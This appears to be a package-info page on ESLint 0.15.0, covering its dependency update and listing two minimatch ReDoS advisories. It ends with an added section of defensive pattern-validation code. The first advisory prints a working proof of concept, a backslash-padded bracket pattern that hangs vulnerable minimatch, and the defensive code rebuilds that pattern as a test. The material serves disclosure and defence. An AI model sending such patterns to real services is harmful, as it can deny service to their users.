ESLint version 0.15.0 represents a notable iteration in the evolution of this popular JavaScript linting tool, building upon the foundation laid by its predecessor, version 0.14.1. While the core description remains consistent – "An AST-based pattern checker for JavaScript" – the devil is in the details, particularly concerning dependency updates, which can impact compatibility and performance. A key difference lies in the updated espree dependency, moving from version 1.8.1 to 1.9.1. This reflects enhancements in JavaScript parsing capabilities, potentially allowing ESLint to better understand and analyze newer JavaScript syntax.
Developers should also note the release dates. Version 0.15.0 was released on February 21, 2015, while version 0.14.1 came out on February 8, 2015. This signifies a relatively short development cycle between the two, suggesting a focus on incremental improvements and bug fixes rather than a complete overhaul. The listed dependencies and devDependencies such as mocha, chai and browserify are useful for contributing to and testing the library itself; version updates in those packages don't usually affect the end user of the library.
For those using ESLint, upgrading to 0.15.0 might be beneficial to leverage the updated parser. However, as always, it's crucial to test the new version with your existing codebase to ensure no regressions or unexpected behavior arises from these dependency updates. This incremental update signifies the project's commitment to supporting modern JavaScript standards and promoting code quality.
All vulnerabilities related to version 0.15.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
var result = "";
for (var i = 0; i <= len; i++) {
result = result + chr;
}
return result;
};
// pattern: an unterminated bracket expression padded with about one million backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: on vulnerable versions the call below does not return in reasonable time
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
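Both minimatch findings above share one root cause: attacker-shaped text reaching the pattern side of the matcher (the bracket-class case for minimatch(path, pattern), the brace-expansion case for braceExpand). The real fix is the upgrade the advisory names, but a caller can also refuse such input before the matcher ever sees it. The following is an added example, not code from this page or from the minimatch project; the length, nesting and group limits are assumptions chosen for illustration, and the matcher is injected so the file runs without minimatch installed (in real use it would be require("minimatch")).

```javascript
// Added example (not from the page or the minimatch project): guard rails for
// pattern strings that reach a glob matcher from an untrusted caller.
// The three limits below are assumptions chosen for this example.

const MAX_PATTERN_LENGTH = 256; // assumed: legitimate patterns are far shorter
const MAX_BRACE_DEPTH = 3;      // assumed: nesting of {a,{b,c}} expansions
const MAX_BRACE_GROUPS = 16;    // assumed: total number of {...} groups

// Escape every glob metacharacter so untrusted text (for example a user-supplied
// file name) is matched literally instead of being interpreted as a pattern.
function escapeGlob(input) {
  return String(input).replace(/[\\*?\[\]{}()!+@|]/g, '\\$&');
}

// Structural checks for a string that genuinely has to be used as a pattern.
// Returns { ok: true } or { ok: false, reason: '...' }.
function validatePattern(pattern) {
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern must be a string' };
  }
  if (pattern.length > MAX_PATTERN_LENGTH) {
    return { ok: false, reason: 'pattern exceeds ' + MAX_PATTERN_LENGTH + ' characters' };
  }
  let depth = 0;        // current {...} nesting depth
  let maxDepth = 0;     // deepest nesting seen so far
  let groups = 0;       // number of '{' seen
  let inBracket = false;
  for (let i = 0; i < pattern.length; i++) {
    const ch = pattern[i];
    if (ch === '\\') { i++; continue; }                       // backslash escapes the next char
    if (inBracket) { if (ch === ']') inBracket = false; continue; }
    if (ch === '[') { inBracket = true; continue; }
    if (ch === '{') {
      depth++; groups++;
      if (depth > maxDepth) maxDepth = depth;
      continue;
    }
    if (ch === '}') {
      if (depth === 0) return { ok: false, reason: 'unbalanced }' };
      depth--;
    }
  }
  if (inBracket) return { ok: false, reason: 'unterminated [ character class' };
  if (depth !== 0) return { ok: false, reason: 'unterminated { brace group' };
  if (maxDepth > MAX_BRACE_DEPTH) return { ok: false, reason: 'brace nesting too deep' };
  if (groups > MAX_BRACE_GROUPS) return { ok: false, reason: 'too many brace groups' };
  return { ok: true };
}

// Wrapper that never calls the matcher when the pattern fails the checks.
// `matcher` is injected so this file runs offline; in real use pass require('minimatch').
function guardedMatch(matcher, path, pattern) {
  const verdict = validatePattern(pattern);
  if (!verdict.ok) {
    throw new Error('rejected pattern: ' + verdict.reason);
  }
  return matcher(path, pattern);
}

// Constructed sample with the shape of the page's proof of concept:
// an unterminated bracket class padded with one million backslashes.
function pocPattern() {
  return '[!' + '\\'.repeat(1000000) + 'A';
}

console.log(validatePattern('src/**/*.{js,ts}'));   // accepted
console.log(validatePattern(pocPattern()));          // rejected before any regex work
console.log(escapeGlob('report[1].txt'));            // report\[1\].txt
```

Prefer escapeGlob whenever the untrusted value is really a literal (a file name to look up), and reserve validatePattern for the rare case where the caller legitimately supplies a glob; the length check alone stops the bracket-class proof of concept, while the nesting and group caps bound the amount of brace expansion a single pattern can trigger.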